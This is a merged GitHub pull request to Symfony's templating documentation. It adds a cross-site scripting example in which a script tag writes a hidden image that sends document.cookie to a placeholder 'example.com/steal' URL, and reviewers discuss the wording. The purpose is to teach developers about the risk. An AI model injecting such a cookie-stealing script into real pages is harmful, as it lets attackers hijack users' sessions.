Skip to content

Add a better example of the dangers of XSS attacks #19805

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Merged
merged 1 commit into from
Apr 23, 2024
Merged

Add a better example of the dangers of XSS attacks #19805

merged 1 commit into from
Apr 23, 2024

Conversation

javiereguiluz
Copy link
Member

I can merge this myself ... but if other maintainers want to do it, keep in mind that there are new occurrences of "XSS attacks" in upper branches that must be updated to link to the new section.

@javiereguiluz javiereguiluz added this to the 5.4 milestone Apr 19, 2024
@javiereguiluz javiereguiluz mentioned this pull request Apr 19, 2024
Closed
@OskarStark
Copy link
Contributor

I can merge this myself ... but if other maintainers want to do it, keep in mind that there are new occurrences of "XSS attacks" in upper branches that must be updated to link to the new section.

Go ahead then 😄

94noni
94noni reviewed Apr 19, 2024
View reviewed changes
templates.rst

My Name
<script type="text/javascript">
document.write('<img src="https://example.com/steal?cookie=' + encodeURIComponent(document.cookie) + '" style="display:none;">');
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

What about use a route with things like /delete/post/1 ?
So reader got the critical idea of having a page making an external action not only query things?

Copy link
Member Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I don't like this idea because it's mixing two different things: XSS attacks is one thing and creating/deleting resources with GET HTTP methods is a different problem. But thanks anyways for reviewing and commenting.

xabbuh
xabbuh reviewed Apr 22, 2024
View reviewed changes
templates.rst
example seems harmless, the attacker could write more advanced JavaScript code
to perform malicious actions.
You'll see ``My Name`` on screen but the attacker just secretly stole your cookies
so they can impersonate you in other websites. This is known as a `Cross-Site Scripting`_
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
so they can impersonate you in other websites. This is known as a `Cross-Site Scripting`_
so they can impersonate you on other websites. This is known as a `Cross-Site Scripting`_

Copy link
Member Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Fixed while merging. Thanks!

@javiereguiluz javiereguiluz merged commit ba663de into symfony:5.4 Apr 23, 2024
3 checks passed
@javiereguiluz javiereguiluz deleted the xss_example branch April 26, 2024 15:47
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@xabbuh xabbuh xabbuh left review comments

@OskarStark OskarStark OskarStark approved these changes

@94noni 94noni 94noni approved these changes

Assignees
No one assigned
Labels
Status: Reviewed
Projects
None yet
Milestone
5.4
Development

Successfully merging this pull request may close these issues.
5 participants
@javiereguiluz @OskarStark @94noni @xabbuh @carsonbot